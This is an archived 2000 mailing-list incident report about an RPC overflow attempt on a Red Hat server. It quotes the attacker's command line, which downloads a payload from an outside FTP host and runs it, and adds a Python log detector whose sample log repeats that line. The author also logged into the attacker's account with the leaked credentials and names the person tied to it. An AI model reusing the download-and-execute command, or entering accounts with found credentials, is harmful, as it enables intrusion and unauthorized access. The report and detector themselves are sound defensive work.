Security Incidents mailing list archives
Crack attempt last weekend
From: Nick Ruisi <n_ruisi () SOFTHOME NET>
Date: Sun, 26 Nov 2000 07:27:52 -0500
Last weekend someone made an attempt at my Red Hat Linux mail server. I am sharing this with you all so you can protect yourself against it.

While looking through my /var/log/messages file, I noticed a line from in.rpcd (don't ask why I haven't disabled it - I hadn't realised it was running). It appears someone was 1) Spoofing themselves as "localhost" and 2) Attempting to overflow the rpc buffer. At the end of the "overflow string" were the following commands:

/bin/sh;mkdir /usr/man/man5/.sart;cd /usr/man/man5/.sart;ncftpget -u agg0 -p sei 209.202.197.152 . c.tar.gz;tar xzvf c.tar.gz;./i

Yes, I have posted this individual's FTP username and password. They left it in my logfile. Using that information, I was able to determine that Lycos owns the netblock of the FTP server (it's a Tripod homepages host). So I logged onto Tripod with that username and password and was able to determine that someone created the account for an identity named Cara Freda (freda () emd2 org). The emd2.org domain appears to be all about hacking and cracking/warez.

Be careful out there!

- Nick Ruisi
Linux Admin

P.S. I have already notified all service providers involved (Lycos, NameZero, Tripod, Angelfire) and they have not responded to me.
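An added example, not part of Nick's post: a small Python detector that reads syslog-style lines, keeps only in.rpcd entries where a long run of unprintable bytes is followed by a semicolon-chained command tail, and pulls out the pieces a defender wants (the "localhost" source claim, the staging directory, the fetch host, and whether the downloaded payload is executed). The log lines are constructed to resemble the post's description; the exact way in.rpcd formats its messages is an assumption.

```python
import re

# Constructed sample syslog lines modelled on the post; the payload line is an
# assumption about how in.rpcd would log the request, not the author's real log.
# \x90 stands in for the unprintable filler that precedes the command tail.
SAMPLE_LOG = [
    "Nov 19 03:14:07 mail in.rpcd[1234]: connect from localhost",
    "Nov 19 03:14:08 mail in.rpcd[1234]: request from localhost: "
    + "\x90" * 40
    + "/bin/sh;mkdir /usr/man/man5/.sart;cd /usr/man/man5/.sart;"
    + "ncftpget -u agg0 -p sei 209.202.197.152 . c.tar.gz;tar xzvf c.tar.gz;./i",
    "Nov 19 03:15:00 mail sendmail[1300]: NOQUEUE: connect from 192.0.2.5",
]

SYSLOG = re.compile(r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) "
                    r"(?P<prog>[\w.-]+)\[\d+\]: (?P<msg>.*)$", re.S)
FILLER = re.compile(r"[^\x20-\x7e]{16,}")   # long run of non-printable bytes
FETCH_TOOLS = {"ncftpget", "ftp", "wget", "lynx", "tftp", "rcp"}
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

def analyze_line(line):
    """Return a finding for an in.rpcd line carrying filler plus a command tail, else None."""
    m = SYSLOG.match(line)
    if not m or m.group("prog") != "in.rpcd":
        return None
    msg = m.group("msg")
    run = FILLER.search(msg)
    if not run:
        return None                          # no filler run: ordinary log noise
    cmds = [c.strip() for c in msg[run.end():].split(";") if c.strip()]
    if not cmds:
        return None
    fetch = [c for c in cmds if c.split()[0] in FETCH_TOOLS]
    mkdirs = [c.split()[1] for c in cmds if c.startswith("mkdir ") and len(c.split()) > 1]
    ip = IPV4.search(fetch[0]) if fetch else None
    return {
        "time": m.group("ts"),
        "claims_localhost": "localhost" in msg[:run.start()],  # spoofed-source hint
        "filler_len": run.end() - run.start(),
        "commands": cmds,
        "staging_dir": mkdirs[0] if mkdirs else None,
        "fetch_host": ip.group(0) if ip else None,
        "executes_payload": any(c.startswith("./") for c in cmds),
    }

def scan(lines):
    """Run analyze_line over a whole log and keep only the hits."""
    return [f for f in (analyze_line(l) for l in lines) if f]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['time']}: fetch from {f['fetch_host']} into {f['staging_dir']}, "
              f"{len(f['commands'])} chained commands, executes={f['executes_payload']}")
```

The fetch host and staging directory it extracts are what you would hand to the hosting provider and search for on the box; a hidden dot-directory under /usr/man is worth a find on its own.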
Current thread:
- Crack attempt last weekend Nick Ruisi (Nov 28)
- Re: Crack attempt last weekend Bryan Smith (Nov 29)
- Re: Crack attempt last weekend Clayton Hoskinson (Nov 30)
- Re: Crack attempt last weekend Bryan Smith (Nov 29)